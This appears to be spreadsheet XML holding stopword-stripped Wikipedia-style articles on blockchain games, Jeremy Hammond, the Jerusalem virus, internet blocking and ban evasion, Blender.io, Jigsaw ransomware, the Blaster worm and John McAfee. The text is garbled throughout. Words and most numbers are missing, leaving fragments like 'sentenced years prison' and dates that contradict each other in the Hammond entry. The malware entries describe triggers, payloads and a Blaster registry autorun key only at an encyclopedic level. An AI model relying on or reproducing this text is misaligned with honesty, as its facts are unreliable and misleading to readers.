analysis evidence surveillance bezos' personal phone technical elements, brief timeline events january 2020 annex press release united nations special rapporteurs untold story jeff bezos beat tabloids excerpt book amazon unbound</t>
  </si>
  <si>
    <t>Blockchain game</t>
  </si>
  <si>
    <t>blockchain game (also known game crypto game) video game includes elements cryptography-based blockchain technologies. blockchain elements games often based cryptocurrency non-fungible tokens (nfts) players buy, sell, trade players, game publisher taking transaction form monetization. subset games also known play-to-earn games include systems allow players earn cryptocurrency gameplay. while blockchain games available since 2017, blockchain games gathered attention video game industry starting 2021, several publishers expressed intent explore potential, well criticism players, developers, companies within game industry. concept blockchain technology, cryptocurrencies nfts, potential monetization routes video games. many live-service games offer in-game customization options, character skins in-game items, players earn trade players using in-game currency. some games also allow trading virtual items using real-world currency, illegal countries video games seen akin gambling. this gray market issues skin gambling, publishers typically shied away allowing players earn real-world funds games. blockchain games typically allow players trade in-game items cryptocurrency, exchanged money, sidestep problems associated gray markets blockchain's traceability. history first known game blockchain technologies cryptokitties, launched axiom november 2017 personal computers. player would purchase nfts ethereum cryptocurrency, consisting virtual player could breed others create offspring combined traits nfts. game made headlines december 2017 virtual sold us$100,000. cryptokitties also exposed scalability problems games ethereum created significant congestion ethereum network shortly launch, approximately ethereum transactions time game, congestion delaying players' transactions. axiom feared ethereum would struggle launched mobile version game, particularly influx users china.the sandbox platform bought brandname 2012 crafting game name, 2018. players could make in-game items using game's toolbox sell them, using game-specific cryptocurrency, others could display virtual landscapes.axie infinity, released 2018 mavis, example "play-to-earn" game, game incentivizes players purchase improve nfts in-game activities resold players publisher, player receiving compensation work. philippines, game popular, players able earn enough earn cost living playing participating game's financial structure. however, following early 2022 hack $600 million stolen axie infinity's publisher, game large drop players impacting game's economy. mavis removed references "play-to-earn" websites marketing tokens plummeted value.in mid-2018, ubisoft also became founding member blockchain game alliance, alongside number leading blockchain companies.by early 2020s breakout success video games using blockchain. such games tended focus using blockchain speculation instead traditional forms gameplay, offers limited appeal players. such games also represent high risk investors revenues difficult predict. however, limited successes games, axie infinity covid-19 pandemic, increasing corporate interest metaverse content, refueled interest area gamefi—a term describing intersection video games financing, typically backed blockchain currency—in second half 2021. 2021, several major publishers, including ubisoft, electronic arts, take interactive, square enix, stated blockchain nft-based games serious consideration companies future.in october 2021, valve corporation banned blockchain games, including using cryptocurrency nfts, hosted steam digital storefront service, widely used personal computer gaming. company claimed extension policy banning games offer in-game items real-world value. valve's prior history gambling, specifically skin gambling, speculated factor decision blockchain games. valve's gabe newell explained later interview believed blockchain technology legitimate, company felt many actors market time allow cryptocurreny nfts onto steam. newell said, "the ways utilised currently pretty sketchy. sort want stay away that." journalists players responded positively valve's decision, blockchain games reputation scams fraud among gamers, blockchain game publishers developers urged valve reconsider position. epic games, runs epic games store competition steam, said would open accepting blockchain games, wake valve's refusal.ubisoft announced foray blockchain gaming ubisoft quartz technology based proof stake tezos cryptocurrency, ubisoft claimed energy efficient. quartz allows players purchase sell digits, special character customization items within publisher's games, service first launching clancy's ghost recon breakpoint december 2021. day, technica stated "ubisoft's… plans make sense" quartz system deeply controlled ubisoft simple conventional internal database would achieve result without overhead blockchain. users criticized technology ubisoft terms service state company liability" claims damages aware blockchain "may subject specific weaknesses, make possibly targets specific cybersecurity threats” disclaim "liability risks implied technology." december, ubisoft de-listed announcement video youtube, following viewer backlash dislike bombing. french trade union solidaires informatique criticized ubisoft's plan quartz, stating blockchain technology "harmful, worthless, without future", useless, costly, ecologically mortifying tech bring anything videogames". after initial release, trade volume digits virtually zero following weeks. players used complained noticed digits multiplayer matches. ubisoft released last digit ghost recon breakpoint march 2022 ended support game shortly thereafter.peter molyneux announced december 2021 development studio 22cans working include blockchain nfts within planned game legacy, business simulation game. players legacy could create parts could sold purchased players order complete assemblies units, using legacycoin based ethereum cryptocurrecy. prior release, speculative buyers able purchase land within game players would establish in-game factories, legacycoin sales land reaching million within days molyneux's announcement. criticism xbox head executive phil spencer said regards blockchain games "that creative today feels exploitative entertainment". when gaming communication platform discord suggested possible ethereum integration client november 2021, users criticized inclusion cryptocurrency discord backed off, affirming plans inclusion.mmo developer damion schubert argued pitches games nfts could also achieved without nfts non-nft options would easier implement.in november 2021 fahy wrote gameindustry.biz "play-to-earn" business model similar earlier systems encouraged rise gold farming later developers shift selling "gold" players directly real currency. argued business model could potentially reintroduce artificial scarcity in-game currency in-game items characters, in-game marketplaces likely payment system game developer takes players sell marketplace item other.in december 2021, game world announced intent include nfts part s.t.a.l.k.e.r. complaints players, later announced would longer pursuing nfts within game.in december 2021, game awards, josef fares, director takes two, stated would rather "shot knee" include nfts games.games journalist jason schreier characterised blockchain "play-to-earn" model pyramid scheme. competing developers "step-to-earn" games—fitness games reward cryptocurrency walking—rushed accuse ponzi schemes simultaneously working toward "solutions ponzinomics problem". developer, stepn, admitted play-to-earn games require constant supply players else token economy would collapse.the game developers conference's 2022 annual report stated developers surveyed said studios interest nfts, said somewhat interested them, said integrating games. addition developers said interested cryptocurrency payment tool games, said somewhat interested, saying already so.square enix's year letter, expressed interest nfts video games, received heavy backlash fans, many additionally expressing disdain letter's comparison "play fun" "play contribute" players.in july 2022, mojang studios announced nfts would permitted minecraft, saying "speculative pricing investment mentality around nfts takes focus away playing game encourages profiteering, think inconsistent long-term success players". also web3 metaverse references</t>
  </si>
  <si>
    <t>Jeremy Hammond</t>
  </si>
  <si>
    <t>jeremy hammond (born january 1985) american activist former computer hacker chicago. founded computer security training website hackthissite 2003. first imprisoned protest warrior hack 2005 later convicted computer fraud 2013 hacking private intelligence firm stratfor releasing data wikileaks, sentenced years prison.in 2019, summoned virginia federal grand jury investigating wikileaks founder julian assange. held civil contempt court refusing testify principle grand jury resistance.he released prison november 2020. early life hammond raised chicago suburb glendale heights, illinois, twin brother jason. hammond became interested computers early age, programming video games qbasic eight, building databases thirteen. student glenbard east high school nearby suburb lombard, hammond first place district-wide science competition computer program designed. while high school, became peace activist, organizing student walkout iraq invasion starting student newspaper oppose iraq war. high school principal described hammond "old beyond years".hammond attended university illinois chicago. spring 2004, freshman year, exploited security flaw computer science department's website went department administrators, offering help security flaws site looking job. inserting backdoor, hammond called department chair ultimately banned returning sophomore year.jeremy, along brother jason, lifelong interest music, performing numerous bands years. before jeremy's arrests, actively performing chicago band dirty surgeon insurgency.hammond worked technician villa park, illinois. also worked developer chicago-based rome company. boss rome company wrote 2010 hammond "friendly, courteous polite suspect tolerance corporate posturing, never demonstrated contempt business workplace". computer hacking activism hammond founded computer security training website hackthissite summer high school graduation. website describes non-profit organization strives protect good security culture learning atmosphere". first years site received million hits acquired 110,000 members volunteer staff 34.during 2004 event vegas, hammond delivered talk encouraged "electronic civil disobedience" means protest 2004 republican national convention supporters.in february 2005, hammond, others, hacked website pro-war counterprotesting group protest warrior accessed thousands credit card numbers, intending donate left-wing groups. although charges ever made cards, hammond confessed sentenced years federal prison crime. freed months, hammond radicalized experience, although terms probation prohibited associating hackthissite anarchist groups another three years. stratfor case march 2012, hammond arrested federal bureau investigation (fbi) agents bridgeport neighborhood chicago involvement december 2011 cyberattack stratfor, private intelligence firm. intrusion compromised 60,000 credit card numbers, $700,000 fraudulent charges, involved download million emails, subsequently published wikileaks. indictment unsealed following manhattan federal district court. individuals united states, england ireland indicted.the hammond information given computer hacker hector xavier monsegur ("sabu"), became government informant immediately arrest early 2011, subsequently pleaded guilty august 2011 twelve counts hacking, fraud, identity theft. although monsegur could received sentence years prison, prosecutors asked sentenced time served, seven months prison. information monsegur helped lead authorities least eight co-conspirators, including hammond, helped disrupt least cyberattacks.the case prosecuted office preet bharara, united states attorney southern district york. hammond represented elizabeth fink.sabu detained pending trial; denying bail, judge loretta preska described hammond substantial danger community." february 2013, defense filed motion asking presiding judge preska recuse case basis preska's husband, thomas kavaler, email address released stratfor disclosure worked stratfor clients affected hack. hammond's legal team argued created "appearance partiality strong disregarded". preska denied motion, claiming connections inconsequential unimportant.in 2013, hammond pleaded guilty count violating computer fraud abuse (cfaa). upon guilty plea, hammond issued statement saying, work anonymous hack stratfor, among websites" believe right." maintained profit motive cyberattack. hammond insisted would carried breach stratfor's systems without involvement sabu. hammond sentenced november 2013, maximum years prison, followed three years supervised release. described prosecution sentence "vengeful, spiteful act." november 2020, hammond released memphis federal correctional institution transferred recovery house serve rest sentence.in october 2019, hammond summoned virginia federal grand jury investigating wikileaks founder julian assange. held civil contempt court judge anthony trenga refusing testify. prosecutors granted hammond immunity prosecution based grand jury testimony, hammond could refuse testify ground right self-incrimination. like chelsea manning (who also held contempt refusing testify), hammond said ideologically opposed grand jury probe conducted "good faith" government already information needed. making contempt ruling, trenga stated hammond's arguments testifying "self-serving assertions without support." trenga ordered hammond released march 2020 conclusion grand jury, saying prosecutors longer required testimony. hammond returned federal prison serve balance year sentence. hammond received early release december 2019 grand jury intervened. personal life hammond frequently identifies anarchist shoulder tattoo anarchy symbol words: "freedom, equality, anarchy." writing arrest, hammond said, always made clear anarchist-communist believe need abolish capitalism state entirety realize free, egalitarian society. watering selling message making marketable masses." also direct action hacktivism references further reading reitman, janet (december 2012). "the rise fall jeremy hammond: enemy state". rolling stone. external links hammond, jeremy. 2004, vegas. "electronic civil disobedience" free jeremy hammond</t>
  </si>
  <si>
    <t>Jerusalem (computer virus)</t>
  </si>
  <si>
    <t>jerusalem logic bomb virus first detected hebrew university jerusalem, october 1987. infection, jerusalem virus becomes memory resident (using memory), infects every executable file run, except command.com. files grow 1,813 bytes infected jerusalem re-infected. executable files grow 1,808 1,823 bytes time infected, re-infected time files loaded large load memory. some .exe files infected grow several overlays follow genuine .exe file file. sometimes .exe files incorrectly infected, causing program fail soon executed. virus code hooks interrupt processing level services. example, code virus suppresses printing console messages example, virus able infect file read-only device floppy disk. clues computer infected mis-capitalization well-known message "bad command file name" "bad command file name". jerusalem virus unique among viruses time, logic bomb, friday 13th years 1987. once triggered, virus deletes program day, also infects .exe files repeatedly grow large computer. this particular feature, included jerusalem's variants, triggered minutes system infected, significantly slows infected computer, thus allowing easier detection. jerusalem also known "blackbox" black displays payload sequence. system text mode, jerusalem creates small black rectangle column column thirty minutes virus activated, rectangle scrolls lines.as result virus hooking low-level timer interrupt, pc-xt systems slow fifth normal speeds minutes virus installed itself, though slowdown less noticeable faster machines. virus contains code enters processing loop time processor's timer tick activated. symptoms also include spontaneous disconnection workstations networks creation large printer spooling files. disconnections occur since jerusalem uses 'interrupt 21h' low-level functions novell netware networking implementations required hook file system. jerusalem initially common (for virus day) spawned large number variants. however, since advent windows, interrupts longer used, jerusalem variants become obsolete. aliases 1808(exe), virus's length 1808 bytes. 1813(com), virus's length 1813 bytes. friday13th (note: name also refer viruses unrelated jerusalem: friday-13th-440/omega virus-b), trigger date friday 13th. hebrew university, discovered students attended hebrew university. israeli plo, belief created palestine liberation organization mark 1948, israel independence day, apparently last palestine existed country. russian saturday sumsdos, referencing piece virus's code. variants password (gp1): discovered 1991, novell netware-specific virus attempts gather passwords netware shell memory upon user login, broadcasts specific socket number network companion program recover them. this virus work novell newer versions. suriv viruses: viruses earlier, primitive versions jerusalem. jerusalem virus considered based suriv-3, logic bomb triggered date friday 13th, switching computer 13th. itself, suriv-3 based predecessors, suriv-1 suriv-2, logic bombs triggered april (april fools' day), showing text reading "april virus!". suriv-1 infects .com files suriv-2 infects .exe files, suriv-3 infects types files. name viruses comes spelling "virus" backwards. sunday (jeru-sunday): (main article: sunday (computer virus))this virus grows files 1,636 bytes. variant intended delete every program every sunday, software bugs prevent happening. sunday, virus displays following message:today sunday! work hard? work play make dull boy! come let's fun! variants sunday sunday.a: original sunday virus. sunday.b: version sunday functional program-deleting function. sunday.1.b: improvement upon sunday.b fixes regarding critical error handler, causes problems write-protected disks. sunday.1.tenseconds: variant sunday.a maintains second delay messages sets sunday instead sunday.2: variant sunday.a grows files 1,733 bytes instead original 1,636 bytes. anarkia: anarkia trigger date tuesday 13th uses self-recognition code "anarkia". psqr (1720): pqsr infects .com .exe files, infect overlay files command.com. causes infected .com files grow 1,720 bytes .exe files 1,719-1,733 bytes. activates friday 13th, delete file day. garbage written master boot record nine sectors mbr. virus uses "pqsr" self-recognition code. frère: frère plays frère jacques fridays. increases size infected .com files 1,813 bytes .exe files 1,808-1,822 bytes, infect command.com. westwood (jerusalem-westwood): westwood causes files grow 1,829 bytes. virus memory-resident, westwood deletes file friday 13th. jerusalem 11-30: this virus infects .com, .exe, overlay files, command.com. virus infects programs used, causes infected .com files grow 2,000 bytes .exe files grow 2,000-2,014 bytes. however, unlike original jerusalem virus, re-infect .exe files. jerusalem-apocalypse: developed italy, virus infects programs executed, insert text "apocalypse!!" infected files. causes infected .com files grow 1,813 bytes .exe grow 1,808-1,822 bytes. re-infect .exe files, increase size already infected .exe files 1,808 bytes. jerusalem-vt1: virus memory-resident, delete file tuesday 1st. jerusalem-t13: virus causes .com .exe files grow 1,812 bytes. virus memory-resident, delete program tuesday 13th. jerusalem-sat13: virus memory-resident, delete program saturday 13th. jerusalem-czech: virus infects .com .exe files, command.com. causes infected .com files grow 1,735 bytes .exe files grow 1,735-1,749 bytes. delete programs friday 13th. jerusalem-czech self-recognition code code placement differ original jerusalem, frequently detected sunday variant. jerusalem-nemesis: this virus inserts strings "nemesis.com" "nokey" infected files. jerusalem-captain trips: jerusalem-captain trips contains strings "captain trips" "spitfire". captain trips name apocalyptic plague described stephen king's novel stand. year year 1990 friday 15th, jerusalem-captain trips creates empty file name program day. 16th jerusalem-captain trip re-programs video controller, several dates installs routine timer tick activates minutes pass. jerusalem-captain trips several errors. jerusalem-j: variant causes .com files grow 1,237 bytes .exe files 1,232 bytes. virus "jerusalem effects", originates hong kong. jerusalem-yellow (growing block): jerusalem-yellow infects .exe .com files. infected .com files grow 1,363 bytes .exe files grow 1,361-1,375 bytes. jerusalem-yellow creates large yellow shadow middle screen computer hangs. jerusalem-jan25: virus memory-resident, activate january delete program day. additionally, re-infect .exe files. skism: virus activate friday 15th month, causes infected .com files grow 1,808 bytes infected .exe grow 1,808-1,822 bytes. additionally, re-infect .exe files. carfield (jeru-carfield): virus causes infected files grow 1,508 bytes. virus memory-resident monday, computer display string "carfield!" every seconds. mendoza (jerusalem mendoza): virus nothing year 1980 1989, years flag virus memory resident floppy disk motor count flag program floppy disk. flag set, every program runs deleted. flag minutes passes, cursor changed block. after hour, caps lock, nums lock, scroll lock switched "off". additionally, re-infect .exe files. einstein: this small variant, bytes, infects .exe files. moctezuma: this variant virus 2,228 bytes encrypted. century: this variant logic bomb trigger date january 2000 supposed display message "welcome 21st century". however, sure legitimacy virus, seen danube: danube virus unique variant jerusalem, evolved beyond jerusalem reflects parts this virus multipartite virus, several methods infect spread: disk boot sectors well .com .exe files. because this, virus works dependent upon origin virus (boot sector program). when contaminated program executed, virus resides memory, taking additionally, check also resides active boot sector place copy present before. when computer booted contaminated boot sector/disk, virus place memory operating system even loaded. reserves base memory, reserves sectors disk infects. this variant jerusalem originates hong kong, references hong kong's technical schools code. jerusalem-1767: this virus infects .exe .com files, infect command.com executes. causes .com files grow 1,767 bytes .exe grow 1,767-1,799 bytes. infected files include strings "**infected friday 13th**" "command.com". jerusalem-1663: this virus infects .exe .com files, including command.com. once memory resident, infects programs run. causes .com .exe files grow 1,663 bytes, cannot recognize infected files, re-infect .com .exe files. jerusalem-haifa: this virus infects .exe .com files, command.com. causes .com files grow 2,178 bytes .exe files grow 1,960-1,974 bytes. name hebrew word haifa, israeli city, virus code. phenome: this virus similar apocalypse variant, infect command.com. activates saturdays, allow user execute programs. features string "phenome.com" "msdos". also timeline computer viruses worms westwood (computer virus) references external links jerusalem's rise fall, chapter virus research report anti-virus company sophos description jerusalem virus anti-virus company network associates description jerusalem virus jerusalem.1808 jerusalem virus</t>
  </si>
  <si>
    <t>Block (Internet)</t>
  </si>
  <si>
    <t>internet, block technical measure intended restrict access information resources. blocking inverse, unblocking, implemented owners computers using software. some countries, notably china singapore, block access certain news information. united states, children's internet protection requires schools receiving federal funded discount rates internet access install filter software blocks obscene content, pornography, and, applicable, content "harmful minors".blocking also refer denying access server based address client machine. certain websites, including social networks facebook editable databases like wikis, users apply blocks (based either number account) users deemed undesirable prevent performing certain actions. blocks kind occur several reasons produce different effects: social networks, users block users without restriction, typically preventing sending messages viewing blocker's information profile. privileged users apply blocks affect access undesirable users entire website. blocking used moderators administrators social media forums deny access users broken rules likely again, order ensure peaceful orderly discussion place. common reasons blocking spamming, trolling, flaming. some criticize cases bans administrators large websites, twitter, saying bans politically financially motivated. however, websites legal right decide allowed post, users often respond "voting feet" going place administrators behavior acceptable. effects blocked users completely unable access part site's content, usually case censoring filtering mechanisms responsible block. wiki sites like wikipedia, blocked user still read pages, cannot edit, move, create them. under shadow ban, user given false impression content still posted site, reality hidden users. evasion evasion block evasion) attempting around ban, whether temporary permanent, website. alternate accounts people evading bans websites referred sockpuppets. typically, someone caught evading sockpuppet, sockpuppet account banned. original temporary, extended even made permanent. sometimes, user's address banned well user cannot access site create accounts. some sites remove traces ban-evader. wikipedia, example, mass-delete pages created ban-evader. evasion detected tracing user's address. accounts using address, could sign evasion. also, vpn, shown rapid, drastic changes address user short period time, also sign user trying around ban. evasion also spotted posts contributions accounts look similar, sites email associated multiple accounts, identical similar emails sign evasion. sites, users permanently banned evasion able appeal ban.when creating sockpuppets, evaders variety tactics disguise fact account created previously banned user, choosing usernames relation defunct accounts, alternate email address, vpns proxy servers mask address, changing address (sometimes needing rely dynamic address automatically change time), using site public internet access locations schools libraries, resorting usage open proxies. other possible measures include somewhat altering conduct exhibiting different behaviour order prevent moderators determining person. also (law) internet censorship address blocking shadow banning references</t>
  </si>
  <si>
    <t>Blender.io</t>
  </si>
  <si>
    <t>blender.io cryptocurrency mixer established 2017. 2022, sanctioned office foreign assets control u.s. department treasury allegedly aiding lazarus group, hacking group associated government north korea. treasury department stated first sanction imposed cryptocurrency mixer. references also tornado cash</t>
  </si>
  <si>
    <t>Jigsaw (ransomware)</t>
  </si>
  <si>
    <t>jigsaw form encrypting ransomware malware created 2016. initially titled "bitcoinblackmailer" later came known jigsaw featuring image billy puppet film franchise. malware encrypts computer files gradually deletes unless ransom paid decrypt files. history jigsaw designed april 2016 released week creation. designed spread malicious attachments spam emails. jigsaw activated user downloads malware programme encrypt user files master boot record. following this, popup featuring billy puppet appear ransom demand style saw's jigsaw (one version including want play game" line franchise) bitcoin exchange decrypting files. ransom paid within hour, file deleted. following hour without ransom payment, amount files deleted exponentially increased time hundred thousands files computer wiped hours. attempt reboot computer terminate process result 1,000 files deleted. updated version also makes threats victim revealing personal information online.jigsaw activates purporting either firefox dropbox task manager. code jigsaw written within .net framework, reverse engineered remove encryption without paying ransom. reception register wrote "using horror movie images references cause distress victim low." 2017, listed among versions ransomware utilised evasive tactics activation. references</t>
  </si>
  <si>
    <t>Blaster (computer worm)</t>
  </si>
  <si>
    <t>blaster (also known lovsan, lovesan, msblast) computer worm spread computers running operating systems windows windows 2000 august 2003.the worm first noticed started spreading august 2003. rate spread increased number infections peaked august 2003. once network (such company university) infected, spread quickly within network firewalls typically prevent internal machines using certain port. filtering isps widespread publicity worm curbed spread blaster. september 2003, jeffrey parson, 18-year-old hopkins, minnesota, indicted creating variant blaster worm; admitted responsibility sentenced 18-month prison term january 2005. author original variant remains unknown. creation effects according court papers, original blaster created security researchers chinese group xfocus reverse engineered original microsoft patch allowed execution attack.the worm spreads exploiting buffer overflow discovered polish security research group last stage delirium dcom service affected operating systems, patch released month earlier ms03-026 later ms03-039. this allowed worm spread without users opening attachments simply spamming large numbers random addresses. four versions detected wild. these well-known exploits original flaw rpc, fact another different vulnerabilities much media attention.the worm programmed start flood port windowsupdate.com system date august december 15th months, thereby creating distributed denial service attack (ddos) site. damage microsoft minimal site targeted windowsupdate.com, rather windowsupdate.microsoft.com, former redirected. microsoft temporarily shut targeted site minimize potential effects worm.the worm's executable, msblast.exe, contains messages. first reads: want love san!! this message gave worm alternative name lovesan. second reads: billy gates make possible stop making money software!! this message bill gates, co-founder microsoft target worm. worm also creates following registry entry launched every time windows starts: hkey_local_machine\software\microsoft\windows\currentversion\run\ windows auto update=msblast.exe timeline 2003: microsoft releases patch would protect users exploit webdav welchia used. (welchia used exploit msblast additional method propagation fixed patch. this method used 200,000 dcom attacks form msblast used.) july 2003: timestamp patch microsoft releases 16th. july 2003: microsoft releases patch would protect users unknown msblast. time also released bulletin describing exploit. around july 2003: white hackers create proof-of-concept code verifying unpatched systems vulnerable. code released. july 2003: cert/cc releases warning suggests blocking port 135. july 2003: cert/cc suggests also blocking ports 445. july 2003: xfocus releases information exploit microsoft released july patch fix. august 2003: u.s. issues alert lookout malware exploiting bug. sometime prior august 2003: other viruses using exploit exist. august 2003: original version worm appears internet. august 2003: symantec antivirus releases rapid release protection update. august 2003, evening: antivirus security firms issued alerts windows update. august 2003: number infected systems reported 30,000. august 2003: worms appear begin spread. (sophos, variant msblast w32/rpcspybot-a, totally worm used exploit) august 2003: number infected systems reported 423,000. august 2003: ddos attack windowsupdate.com starts. (largely unsuccessful merely redirect real site, windowsupdate.microsoft.com.) august 2003: microsoft issues alert regarding msblast variants. august 2003: related helpful worm, welchia, appears internet. august 2003: symantec upgrades risk assessment welchia "high" (category august 2003: mcafee lowers risk assessment "medium". august 2003: potential ddos attack discovered variant worm. january 2004: welchia deletes itself. january 2004: microsoft releases stand-alone tool remove msblast worm variants. february 2004: variant related worm welchia discovered internet. february 2004: symantec lowers risk assessment welchia worm "low" (category march 2004: mcafee lowers risk assessment "low". april 2004: another variant discovered. january 2005: creator variant msblaster sentenced months prison. side effects although worm spread systems running windows 2000 windows cause instability service systems running versions windows including windows server 2003 windows professional edition. particular, worm spread windows server 2003 windows server 2003 compiled switch, detected buffer overflow shut rpcss process down. when infection occurs, buffer overflow causes service crash, leading windows display following message automatically reboot, usually seconds. system shutdown: this system shutting down. please save work progress off. unsaved changes lost. this shutdown initiated authority\system time shutdown: hours:minutes:seconds message: windows must restart remote procedure call (rpc) service terminated unexpectedly. this first indication many users infection; often occurred minutes every startup compromised machines. simple resolution stop countdown "shutdown command, causing side effects empty (without users) welcome screen. welchia worm similar effect. months later, sasser worm surfaced, caused similar message appear. also references</t>
  </si>
  <si>
    <t>John McAfee</t>
  </si>
  <si>
    <t>john david mcafee mak-ə-fee; september 1945 june 2021) british-american computer programmer, businessman, two-time presidential candidate unsuccessfully sought libertarian party nomination president united states 2016 2020. 1987, wrote first commercial anti-virus software, founding mcafee associates sell creation. resigned 1994 sold remaining stake company. mcafee became company's vocal critic later years, urging consumers uninstall company's anti-virus software, characterized bloatware. disavowed company's continued name branding, practice persisted spite short-lived corporate rebrand attempt intel ownership. mcafee's fortunes plummeted financial crisis 2007–2008. after leaving mcafee associates, founded companies tribal voice (makers powwow chat program), quorumex, future tense central, among others, involved leadership positions companies everykey, capital investments, luxcore, among others. personal business interests included smartphone apps, cryptocurrency, yoga, light-sport aircraft recreational drug use. resided number years belize, returned united states 2013 wanted belize questioning suspicion murder.in october 2020, mcafee arrested spain u.s. evasion charges. u.s. federal prosecutors brought criminal civil charges alleging mcafee failed file income taxes four-year period. june 2021, found dead apparent suicide hanging prison cell near barcelona shortly spanish national court authorized extradition u.s. death generated speculation conspiracy theories possibility murdered. mcafee's wife, janice mcafee, said believe mcafee committed suicide, claimed suicide note forgery. early life mcafee born cinderford, forest dean, gloucestershire, england, september 1945, u.s. army base 596th ordnance ammunition company), american father, mcafee, stationed there, british mother, joan (williams). father roanoke, mcafee primarily raised salem, virginia, united states. said felt much british american. when father, columnist described abusive alcoholic", killed gun. spent childhood living fear beating father could happen time, struggled make sense happening him.mcafee received bachelor's degree mathematics 1967 roanoke college virginia, subsequently awarded honorary doctor science degree 2008. after receiving bachelor's degree, mcafee began working towards doctorate mathematics northeast louisiana state college expelled, 1968, relationship undergraduate student, became first wife. ventures nasa, univac, xerox, csc, booz allen lockheed mcafee employed programmer nasa's institute space studies york city 1968 1970 working apollo program. from there, went univac software designer, later xerox operating system architect. 1978, joined computer sciences corporation software consultant. worked consulting firm booz allen hamilton 1980 1982. 1986, employed lockheed, read brain computer virus made found terrifying. sensing business opportunity, went creating antivirus software could detect computer virus remove automatically. 1987 mcafee created mcafee associates inc. sell software, named virusscan. this first anti-virus software brought market, first software products distributed internet. mcafee associates initially mcafee seek large userbase paying users, rather wanted raise awareness need protected computer viruses. however, making people fear malware, managed generate millions sales, 1990 making five million dollars year. company incorporated delaware 1992, initial public offering year. august 1993, mcafee stepped chief executive remained company chief technical officer. succeeded bill larson. 1994 sold remaining stake company. involvement operations.after various mergers ownership changes, intel acquired mcafee august 2010. january 2014, intel announced mcafee-related products would marketed intel security. mcafee expressed pleasure name change, saying, everlastingly grateful intel freeing terrible association worst software planet." business soon de-merged intel, mcafee name. powwow, quoromex, other business ventures founded mcafee include tribal voice, developed first instant messaging programs, powwow. 2000, invested joined board directors zone labs, makers firewall software, prior acquisition check point software 2003.in 2000s mcafee invested advertised ultra-light flights, marketed aerotrekking.in august 2009 york times reported mcafee's personal fortune declined million peak $100 million effect financial crisis 2007–2008 investments.in 2009, mcafee interviewed belize cnbc special bubble decade, reported invested and/or built many mansions went unsold 2007 global recession hit. report also discussed quest raise plants possible medicinal uses land belize.in february 2010, mcafee started company quorumex, headquartered belize, aimed produce herbal antibiotics disrupt quorum sensing bacteria.in june 2013, mcafee uploaded parody video titled uninstall mcafee antivirus onto youtube channel. critiques antivirus software snorting white powder stripped scantily clad women. received million views. told reuters video meant ridicule media's negative coverage him. spokesman mcafee inc. called video's statements "ludicrous".also 2013, mcafee founded future tense central, aimed produce secure computer network device called d-central. 2016, also incubator.in february 2014, mcafee announced cognizant, application smartphones, displays information permissions installed applications. april 2014, renamed dcentral android version released free google play. conference vegas august 2014, mcafee warned people smartphones, suggesting apps used clueless consumers read privacy user agreements. january 2016, became chief evangelist security startup everykey.in february 2016, mcafee publicly volunteered decrypt iphone used rizwan farook tashfeen malik bernardino, avoiding need apple build backdoor. later admitted claims regarding ease cracking phone publicity stunt, still asserting possibility.in 2016, mcafee appointed chairman capital investments, technology holding company. initially said would rename john mcafee global technologies, although plan abandoned dispute intel rights "mcafee" name. changed mgt's focus social gaming cybersecurity, saying "anti-virus software dead, longer works", "the paradigm stop hacker getting damage.soon joining mgt, mcafee said team exploited flaw android operating system allowed read encrypted messages whatsapp. gizmodo investigated claim, reported sent reporters malware-infected phones make hack work. replied: course phones malware them. malware story, release speaking google. involves serious flaw android architecture."mcafee moved mining bitcoin cryptocurrencies, make money company, increase mgt's expertise dealing blockchains, thought important cybersecurity.in august 2017, mcafee stepped ceo, instead serving mgt's "chief cybersecurity visionary". january 2018, left company altogether. both sides said split amicable; said wanted spend time cryptocurrencies, company told pressure potential investors disassociate him.on august 2018, mcafee took position luxcore, cryptocurrency company focused enterprise solutions. politics positions mcafee libertarian, advocating decriminalization cannabis, drugs, non-interventionism foreign policy, free market economy redistribute wealth, upholding free trade. supported abolishing transportation security administration.mcafee advocated increased cyber awareness action threat cyberwarfare. pushed religious liberty, saying business owners able deny service circumstances contradict religious beliefs, adding: forcing anything choose person another. forced anything harming you? it's choice sell, choice buy." 2016 presidential campaign september 2015, mcafee announced president united states 2016 presidential election, candidate newly formed political party called cyber party. december 2015, re-announced candidacy saying would instead seek presidential nomination libertarian party. campaign trail, consistently polled alongside party's candidates, gary johnson austin petersen. three partook libertarian party's first nationally televised presidential debate march 2016. running mate photographer, commercial real estate broker libertarian activist judd weiss.mcafee came second primaries third 2016 libertarian national convention. notable endorsements adam kokesh, talk show host activist john moore, nevada assemblyman neil smith, science fiction author activist 2020 presidential campaign contrary assertion 2016 convention, mcafee tweeted june 2018 would president 2020, either libertarian party separate party would create. later chose libertarian. mainly campaigned wider cryptocurrency use. january 2019, mcafee tweeted would continue campaign exile", following reports wife, four campaign staff indicted tax-related felonies irs. said "international waters", previously tweeted going venezuela. commented alleged indictments. defended communist revolutionary guevara twitter, putting odds libertarian national committee chairman nicholas sarwark, wrote, hear little buzz mcafee time around making defense guevara cuba ingratiate cuban government, resonate well libertarians."in tweet march 2020, mcafee simultaneously suspended 2020 presidential campaign, endorsed vermin supreme, announced campaign libertarian party vice presidential nomination. next day, returned presidential field, reversing suspension bid, libertarian party would consider vice president." next month, endorsed adam kokesh became kokesh's vice-presidential candidate, still seeking presidency himself. 2020 libertarian national convention, lost, jorgensen spike cohen presidential vice-presidential slots. economic views mcafee contended taxes illegal, claimed 2019 filed return since 2010. referred prime target" internal revenue service.in july 2017, mcafee predicted twitter price bitcoin would jump $500,000 within three years, adding: not, dick national television." july 2019, predicted price million 2020. january 2020, tweeted predictions ruse onboard users", bitcoin limited potential ancient technology." legal issues mcafee named defendant 2008 civil court case related aerotrekking light-sport aircraft venture death nephew joel bitow passenger.on april 2012, mcafee's property orange walk town, belize, raided gang suppression unit belize police department. press release said arrested unlicensed drug manufacturing possession unlicensed weapon. released without charge.in 2012, belize police spokesman raphael martinez confirmed mcafee neither convicted charged, suspected.in january 2014, canada, said belizean government raided property, seized assets, house later burned suspicious circumstances.on august 2015, mcafee arrested henderson county, tennessee, count driving influence count possession firearm intoxicated.in july 2019, mcafee members entourage arrested yacht docked puerto plata, dominican republic, suspicion carrying high-caliber weapons ammunition. they held four days released. weapons seized, according public ministry.on august 2020, mcafee falsely stated arrested norway covid-19 pandemic refusing replace lace thong effective face mask. later tweeted picture bruised eye, claiming occurred arrest. photo alleged arrest shows officer german word "police" uniform, invalidating mcafee's claim arrested norway. augsburg police later said tried enter germany day, arrested. death gregory faull november 2012, belize police began search mcafee person interest connection homicide investigation american expatriate gregory viant faull, found dead gunshot wound before, home island ambergris caye, largest island belize. faull neighbor mcafee's. contemporary interview wired, mcafee said afraid police would kill refused routine questions evaded them. buried sand several hours cardboard head. belize's prime minister, dean 